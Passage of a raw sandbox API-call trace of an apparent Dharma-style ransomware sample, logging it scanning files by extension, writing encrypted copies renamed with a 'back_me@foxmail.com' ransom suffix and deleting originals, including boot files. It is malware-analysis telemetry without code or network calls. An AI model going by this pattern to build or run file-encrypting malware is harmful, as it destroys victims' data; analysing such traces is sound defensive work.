lstrlenW (lpString=".xlsx") returned 5 [0056.572] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0056.572] lstrlenW (lpString=".ppt") returned 4 [0056.572] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0056.572] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01216_.WMF") returned 63 [0056.572] lstrlenW (lpString=".zip") returned 4 [0056.572] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0056.572] lstrlenW (lpString=".rar") returned 4 [0056.572] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0056.572] lstrlenW (lpString=".bz2") returned 4 [0056.572] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0056.572] lstrlenW (lpString=".7z") returned 3 [0056.572] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0056.572] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01216_.WMF") returned 63 [0056.572] lstrlenW (lpString=".dbf") returned 4 [0056.572] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0056.572] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01216_.WMF") returned 63 [0056.572] lstrlenW (lpString=".1cd") returned 4 [0056.572] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0056.572] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01216_.WMF") returned 63 [0056.572] lstrlenW (lpString=".jpg") returned 4 [0056.572] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 Thread: id = 12 os_tid = 0x9a4 [0033.852] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x10000) returned 0x2e50058 [0033.852] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x10000) returned 0x2e60060 [0033.852] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x10) returned 0xba7ee8 [0033.852] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x6) returned 0xbf8d18 [0033.852] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x10) returned 0xba7f30 [0033.853] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x100000) returned 0x3b10020 [0033.853] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x10) returned 0xba7f48 [0033.853] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xba7f48, Size=0x20) returned 0xb901f8 [0033.853] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x10) returned 0xba7f48 [0033.853] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xba7f48, Size=0x20) returned 0xb90220 [0033.853] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000 [0033.853] GetProcAddress (hModule=0x76c20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76c4d650 [0033.853] Wow64DisableWow64FsRedirection (in: OldValue=0x332ff58 | out: OldValue=0x332ff58*=0x0) returned 1 [0033.853] lstrlenW (lpString="kernel32.dll") returned 12 [0033.853] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xb901f8 | out: hHeap=0xb10000) returned 1 [0033.853] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0033.853] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xb90220 | out: hHeap=0xb10000) returned 1 [0033.853] Sleep (dwMilliseconds=0x64) [0034.445] lstrcmpiW (lpString1=".ini", lpString2=".php") returned -1 [0034.445] lstrlenW (lpString="desktop.ini") returned 11 [0034.445] CreateFileW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0034.446] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x332ff1c | out: lpFileSize=0x332ff1c*=129) returned 1 [0034.446] CloseHandle (hObject=0x164) returned 1 [0034.446] GetFileAttributesW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini")) returned 0x26 [0034.446] GetFileAttributesW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\$recycle.bin\\s-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0034.446] CreateFileW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0034.446] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.446] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.446] CreateFileW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\$recycle.bin\\s-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x168 [0034.456] GetLastError () returned 0x0 [0034.456] ReadFile (in: hFile=0x164, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x81, lpOverlapped=0x0) returned 1 [0034.469] WriteFile (in: hFile=0x168, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0x90, lpOverlapped=0x0) returned 1 [0034.470] ReadFile (in: hFile=0x164, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x0, lpOverlapped=0x0) returned 1 [0034.470] WriteFile (in: hFile=0x168, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0xea, lpOverlapped=0x0) returned 1 [0034.471] SetEndOfFile (hFile=0x168) returned 1 [0034.471] CloseHandle (hObject=0x168) returned 1 [0034.471] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.471] SetEndOfFile (hFile=0x164) returned 1 [0034.472] CloseHandle (hObject=0x164) returned 1 [0034.472] SetFileAttributesW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x26) returned 1 [0034.473] DeleteFileW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini")) returned 1 [0034.473] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0034.473] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0034.473] lstrlenW (lpString=".doc") returned 4 [0034.473] lstrcmpiW (lpString1=".doc", lpString2=".ini") returned -1 [0034.473] lstrlenW (lpString=".docx") returned 5 [0034.473] lstrcmpiW (lpString1=".docx", lpString2="p.ini") returned -1 [0034.473] lstrlenW (lpString=".pdf") returned 4 [0034.473] lstrcmpiW (lpString1=".pdf", lpString2=".ini") returned 1 [0034.473] lstrlenW (lpString=".xls") returned 4 [0034.473] lstrcmpiW (lpString1=".xls", lpString2=".ini") returned 1 [0034.473] lstrlenW (lpString=".xlsx") returned 5 [0034.473] lstrcmpiW (lpString1=".xlsx", lpString2="p.ini") returned -1 [0034.473] lstrlenW (lpString=".ppt") returned 4 [0034.473] lstrcmpiW (lpString1=".ppt", lpString2=".ini") returned 1 [0034.473] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0034.473] lstrlenW (lpString=".zip") returned 4 [0034.473] lstrcmpiW (lpString1=".zip", lpString2=".ini") returned 1 [0034.473] lstrlenW (lpString=".rar") returned 4 [0034.473] lstrcmpiW (lpString1=".rar", lpString2=".ini") returned 1 [0034.473] lstrlenW (lpString=".bz2") returned 4 [0034.473] lstrcmpiW (lpString1=".bz2", lpString2=".ini") returned -1 [0034.473] lstrlenW (lpString=".7z") returned 3 [0034.473] lstrcmpiW (lpString1=".7z", lpString2="ini") returned -1 [0034.474] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0034.474] lstrlenW (lpString=".dbf") returned 4 [0034.474] lstrcmpiW (lpString1=".dbf", lpString2=".ini") returned -1 [0034.474] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0034.474] lstrlenW (lpString=".1cd") returned 4 [0034.474] lstrcmpiW (lpString1=".1cd", lpString2=".ini") returned -1 [0034.474] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0034.474] lstrlenW (lpString=".jpg") returned 4 [0034.474] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0034.474] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0034.474] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0034.474] lstrlenW (lpString=".doc") returned 4 [0034.474] lstrcmpiW (lpString1=".doc", lpString2=".ini") returned -1 [0034.474] lstrlenW (lpString=".docx") returned 5 [0034.474] lstrcmpiW (lpString1=".docx", lpString2="p.ini") returned -1 [0034.474] lstrlenW (lpString=".pdf") returned 4 [0034.474] lstrcmpiW (lpString1=".pdf", lpString2=".ini") returned 1 [0034.474] lstrlenW (lpString=".xls") returned 4 [0034.474] lstrcmpiW (lpString1=".xls", lpString2=".ini") returned 1 [0034.474] lstrlenW (lpString=".xlsx") returned 5 [0034.474] lstrcmpiW (lpString1=".xlsx", lpString2="p.ini") returned -1 [0034.474] lstrlenW (lpString=".ppt") returned 4 [0034.474] lstrcmpiW (lpString1=".ppt", lpString2=".ini") returned 1 [0034.474] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0034.474] lstrlenW (lpString=".zip") returned 4 [0034.474] lstrcmpiW (lpString1=".zip", lpString2=".ini") returned 1 [0034.474] lstrlenW (lpString=".rar") returned 4 [0034.474] lstrcmpiW (lpString1=".rar", lpString2=".ini") returned 1 [0034.474] lstrlenW (lpString=".bz2") returned 4 [0034.474] lstrcmpiW (lpString1=".bz2", lpString2=".ini") returned -1 [0034.474] lstrlenW (lpString=".7z") returned 3 [0034.474] lstrcmpiW (lpString1=".7z", lpString2="ini") returned -1 [0034.475] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0034.475] lstrlenW (lpString=".dbf") returned 4 [0034.475] lstrcmpiW (lpString1=".dbf", lpString2=".ini") returned -1 [0034.475] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0034.475] lstrlenW (lpString=".1cd") returned 4 [0034.475] lstrcmpiW (lpString1=".1cd", lpString2=".ini") returned -1 [0034.475] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0034.475] lstrlenW (lpString=".jpg") returned 4 [0034.475] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0034.475] lstrcmpiW (lpString1=".LOG", lpString2=".php") returned -1 [0034.475] lstrlenW (lpString="BCD.LOG") returned 7 [0034.475] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG" (normalized: "c:\\boot\\bcd.log"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0034.475] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0034.475] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0034.475] lstrlenW (lpString=".doc") returned 4 [0034.475] lstrcmpiW (lpString1=".doc", lpString2=".LOG") returned -1 [0034.475] lstrlenW (lpString=".docx") returned 5 [0034.475] lstrcmpiW (lpString1=".docx", lpString2="D.LOG") returned -1 [0034.475] lstrlenW (lpString=".pdf") returned 4 [0034.475] lstrcmpiW (lpString1=".pdf", lpString2=".LOG") returned 1 [0034.475] lstrlenW (lpString=".xls") returned 4 [0034.475] lstrcmpiW (lpString1=".xls", lpString2=".LOG") returned 1 [0034.475] lstrlenW (lpString=".xlsx") returned 5 [0034.475] lstrcmpiW (lpString1=".xlsx", lpString2="D.LOG") returned -1 [0034.475] lstrlenW (lpString=".ppt") returned 4 [0034.476] lstrcmpiW (lpString1=".ppt", lpString2=".LOG") returned 1 [0034.476] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0034.476] lstrlenW (lpString=".zip") returned 4 [0034.476] lstrcmpiW (lpString1=".zip", lpString2=".LOG") returned 1 [0034.476] lstrlenW (lpString=".rar") returned 4 [0034.476] lstrcmpiW (lpString1=".rar", lpString2=".LOG") returned 1 [0034.476] lstrlenW (lpString=".bz2") returned 4 [0034.476] lstrcmpiW (lpString1=".bz2", lpString2=".LOG") returned -1 [0034.476] lstrlenW (lpString=".7z") returned 3 [0034.476] lstrcmpiW (lpString1=".7z", lpString2="LOG") returned -1 [0034.476] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0034.476] lstrlenW (lpString=".dbf") returned 4 [0034.476] lstrcmpiW (lpString1=".dbf", lpString2=".LOG") returned -1 [0034.476] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0034.476] lstrlenW (lpString=".1cd") returned 4 [0034.476] lstrcmpiW (lpString1=".1cd", lpString2=".LOG") returned -1 [0034.476] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0034.476] lstrlenW (lpString=".jpg") returned 4 [0034.476] lstrcmpiW (lpString1=".jpg", lpString2=".LOG") returned -1 [0034.476] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0034.476] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0034.476] lstrlenW (lpString=".doc") returned 4 [0034.476] lstrcmpiW (lpString1=".doc", lpString2=".LOG") returned -1 [0034.476] lstrlenW (lpString=".docx") returned 5 [0034.476] lstrcmpiW (lpString1=".docx", lpString2="D.LOG") returned -1 [0034.476] lstrlenW (lpString=".pdf") returned 4 [0034.476] lstrcmpiW (lpString1=".pdf", lpString2=".LOG") returned 1 [0034.476] lstrlenW (lpString=".xls") returned 4 [0034.476] lstrcmpiW (lpString1=".xls", lpString2=".LOG") returned 1 [0034.476] lstrlenW (lpString=".xlsx") returned 5 [0034.476] lstrcmpiW (lpString1=".xlsx", lpString2="D.LOG") returned -1 [0034.476] lstrlenW (lpString=".ppt") returned 4 [0034.476] lstrcmpiW (lpString1=".ppt", lpString2=".LOG") returned 1 [0034.477] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0034.477] lstrlenW (lpString=".zip") returned 4 [0034.477] lstrcmpiW (lpString1=".zip", lpString2=".LOG") returned 1 [0034.477] lstrlenW (lpString=".rar") returned 4 [0034.477] lstrcmpiW (lpString1=".rar", lpString2=".LOG") returned 1 [0034.477] lstrlenW (lpString=".bz2") returned 4 [0034.477] lstrcmpiW (lpString1=".bz2", lpString2=".LOG") returned -1 [0034.477] lstrlenW (lpString=".7z") returned 3 [0034.477] lstrcmpiW (lpString1=".7z", lpString2="LOG") returned -1 [0034.477] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0034.477] lstrlenW (lpString=".dbf") returned 4 [0034.477] lstrcmpiW (lpString1=".dbf", lpString2=".LOG") returned -1 [0034.477] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0034.477] lstrlenW (lpString=".1cd") returned 4 [0034.477] lstrcmpiW (lpString1=".1cd", lpString2=".LOG") returned -1 [0034.477] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0034.477] lstrlenW (lpString=".jpg") returned 4 [0034.477] lstrcmpiW (lpString1=".jpg", lpString2=".LOG") returned -1 [0034.477] lstrcmpiW (lpString1=".DAT", lpString2=".php") returned -1 [0034.477] lstrlenW (lpString="BOOTSTAT.DAT") returned 12 [0034.477] CreateFileW (lpFileName="C:\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x168 [0034.530] GetFileSizeEx (in: hFile=0x168, lpFileSize=0x332ff1c | out: lpFileSize=0x332ff1c*=65536) returned 1 [0034.530] CloseHandle (hObject=0x168) returned 1 [0034.531] GetFileAttributesW (lpFileName="C:\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat")) returned 0x26 [0034.531] GetFileAttributesW (lpFileName="C:\\Boot\\BOOTSTAT.DAT.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\boot\\bootstat.dat.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0034.531] CreateFileW (lpFileName="C:\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x168 [0034.531] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.531] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.531] CreateFileW (lpFileName="C:\\Boot\\BOOTSTAT.DAT.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\boot\\bootstat.dat.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0034.531] GetLastError () returned 0x0 [0034.531] ReadFile (in: hFile=0x168, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x10000, lpOverlapped=0x0) returned 1 [0034.534] WriteFile (in: hFile=0x16c, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0x10010, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0x10010, lpOverlapped=0x0) returned 1 [0034.536] ReadFile (in: hFile=0x168, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x0, lpOverlapped=0x0) returned 1 [0034.536] WriteFile (in: hFile=0x16c, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0xec, lpOverlapped=0x0) returned 1 [0034.536] SetEndOfFile (hFile=0x16c) returned 1 [0034.536] CloseHandle (hObject=0x16c) returned 1 [0034.538] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.538] SetEndOfFile (hFile=0x168) returned 1 [0034.539] CloseHandle (hObject=0x168) returned 1 [0034.539] SetFileAttributesW (lpFileName="C:\\Boot\\BOOTSTAT.DAT.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x26) returned 1 [0034.539] DeleteFileW (lpFileName="C:\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat")) returned 1 [0034.539] lstrlenW (lpString="C:\\Boot\\BOOTSTAT.DAT") returned 20 [0034.539] lstrlenW (lpString="C:\\Boot\\BOOTSTAT.DAT") returned 20 [0034.539] lstrlenW (lpString=".doc") returned 4 [0034.539] lstrcmpiW (lpString1=".doc", lpString2=".DAT") returned 1 [0034.539] lstrlenW (lpString=".docx") returned 5 [0034.539] lstrcmpiW (lpString1=".docx", lpString2="T.DAT") returned -1 [0034.540] lstrlenW (lpString=".pdf") returned 4 [0034.540] lstrcmpiW (lpString1=".pdf", lpString2=".DAT") returned 1 [0034.540] lstrlenW (lpString=".xls") returned 4 [0034.540] lstrcmpiW (lpString1=".xls", lpString2=".DAT") returned 1 [0034.540] lstrlenW (lpString=".xlsx") returned 5 [0034.540] lstrcmpiW (lpString1=".xlsx", lpString2="T.DAT") returned -1 [0034.540] lstrlenW (lpString=".ppt") returned 4 [0034.540] lstrcmpiW (lpString1=".ppt", lpString2=".DAT") returned 1 [0034.540] lstrlenW (lpString="C:\\Boot\\BOOTSTAT.DAT") returned 20 [0034.540] lstrlenW (lpString=".zip") returned 4 [0034.540] lstrcmpiW (lpString1=".zip", lpString2=".DAT") returned 1 [0034.540] lstrlenW (lpString=".rar") returned 4 [0034.540] lstrcmpiW (lpString1=".rar", lpString2=".DAT") returned 1 [0034.540] lstrlenW (lpString=".bz2") returned 4 [0034.540] lstrcmpiW (lpString1=".bz2", lpString2=".DAT") returned -1 [0034.540] lstrlenW (lpString=".7z") returned 3 [0034.540] lstrcmpiW (lpString1=".7z", lpString2="DAT") returned -1 [0034.540] lstrlenW (lpString="C:\\Boot\\BOOTSTAT.DAT") returned 20 [0034.540] lstrlenW (lpString=".dbf") returned 4 [0034.540] lstrcmpiW (lpString1=".dbf", lpString2=".DAT") returned 1 [0034.541] lstrlenW (lpString="C:\\Boot\\BOOTSTAT.DAT") returned 20 [0034.541] lstrlenW (lpString=".1cd") returned 4 [0034.541] lstrcmpiW (lpString1=".1cd", lpString2=".DAT") returned -1 [0034.541] lstrlenW (lpString="C:\\Boot\\BOOTSTAT.DAT") returned 20 [0034.541] lstrlenW (lpString=".jpg") returned 4 [0034.541] lstrcmpiW (lpString1=".jpg", lpString2=".DAT") returned 1 [0034.541] lstrlenW (lpString="C:\\Boot\\BOOTSTAT.DAT") returned 20 [0034.541] lstrlenW (lpString="C:\\Boot\\BOOTSTAT.DAT") returned 20 [0034.541] lstrlenW (lpString=".doc") returned 4 [0034.541] lstrcmpiW (lpString1=".doc", lpString2=".DAT") returned 1 [0034.541] lstrlenW (lpString=".docx") returned 5 [0034.541] lstrcmpiW (lpString1=".docx", lpString2="T.DAT") returned -1 [0034.541] lstrlenW (lpString=".pdf") returned 4 [0034.541] lstrcmpiW (lpString1=".pdf", lpString2=".DAT") returned 1 [0034.541] lstrlenW (lpString=".xls") returned 4 [0034.541] lstrcmpiW (lpString1=".xls", lpString2=".DAT") returned 1 [0034.541] lstrlenW (lpString=".xlsx") returned 5 [0034.541] lstrcmpiW (lpString1=".xlsx", lpString2="T.DAT") returned -1 [0034.541] lstrlenW (lpString=".ppt") returned 4 [0034.541] lstrcmpiW (lpString1=".ppt", lpString2=".DAT") returned 1 [0034.541] lstrlenW (lpString="C:\\Boot\\BOOTSTAT.DAT") returned 20 [0034.541] lstrlenW (lpString=".zip") returned 4 [0034.541] lstrcmpiW (lpString1=".zip", lpString2=".DAT") returned 1 [0034.541] lstrlenW (lpString=".rar") returned 4 [0034.541] lstrcmpiW (lpString1=".rar", lpString2=".DAT") returned 1 [0034.541] lstrlenW (lpString=".bz2") returned 4 [0034.541] lstrcmpiW (lpString1=".bz2", lpString2=".DAT") returned -1 [0034.541] lstrlenW (lpString=".7z") returned 3 [0034.541] lstrcmpiW (lpString1=".7z", lpString2="DAT") returned -1 [0034.541] lstrlenW (lpString="C:\\Boot\\BOOTSTAT.DAT") returned 20 [0034.541] lstrlenW (lpString=".dbf") returned 4 [0034.541] lstrcmpiW (lpString1=".dbf", lpString2=".DAT") returned 1 [0034.541] lstrlenW (lpString="C:\\Boot\\BOOTSTAT.DAT") returned 20 [0034.542] lstrlenW (lpString=".1cd") returned 4 [0034.542] lstrcmpiW (lpString1=".1cd", lpString2=".DAT") returned -1 [0034.542] lstrlenW (lpString="C:\\Boot\\BOOTSTAT.DAT") returned 20 [0034.542] lstrlenW (lpString=".jpg") returned 4 [0034.542] lstrcmpiW (lpString1=".jpg", lpString2=".DAT") returned 1 [0034.542] Sleep (dwMilliseconds=0x64) [0034.666] lstrcmpiW (lpString1=".xml", lpString2=".php") returned 1 [0034.666] lstrlenW (lpString="ExcelMUI.xml") returned 12 [0034.666] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x168 [0034.667] GetFileSizeEx (in: hFile=0x168, lpFileSize=0x332ff1c | out: lpFileSize=0x332ff1c*=1565) returned 1 [0034.667] CloseHandle (hObject=0x168) returned 1 [0034.667] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml")) returned 0x2020 [0034.667] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0034.667] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x168 [0034.667] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.667] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.667] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0034.705] GetLastError () returned 0x0 [0034.705] ReadFile (in: hFile=0x168, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, 